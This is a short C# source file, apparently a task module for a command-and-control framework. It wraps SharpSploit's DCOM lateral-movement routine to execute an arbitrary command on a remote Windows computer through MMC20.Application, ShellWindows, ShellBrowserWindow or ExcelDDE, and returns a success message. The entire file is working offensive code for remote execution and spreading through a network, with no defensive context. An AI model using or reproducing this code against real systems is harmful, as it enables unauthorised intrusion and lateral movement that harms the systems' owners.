using System;

using SharpSploit.LateralMovement;

public static class Task
{
    public static string Execute(string ComputerName, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", string Method = "MMC20.Application")
    {
        DCOM.DCOMMethod theMethod = DCOM.DCOMMethod.MMC20_Application;
        if (Method.ToLower() == "shellwindows") { theMethod = DCOM.DCOMMethod.ShellWindows; }
        else if (Method.ToLower() == "shellbrowserwindow") { theMethod = DCOM.DCOMMethod.ShellBrowserWindow; }
        else if (Method == "ExcelDDE") { theMethod = DCOM.DCOMMethod.ExcelDDE; }
        else if (Method != "MMC20_Application" && Method != "MMC20.Application") { return "DCOM Execution failed. Invalid DCOMMethod specified."; }

        if (DCOM.DCOMExecute(ComputerName, Command, Parameters, Directory, theMethod))
        {
            return "DCOM execution successful. Executed: \"" + Directory + Command + " " + Parameters + "\" on: " + ComputerName;
        }
        else
        {
            return "DCOM execution failed.";
        }
    }
}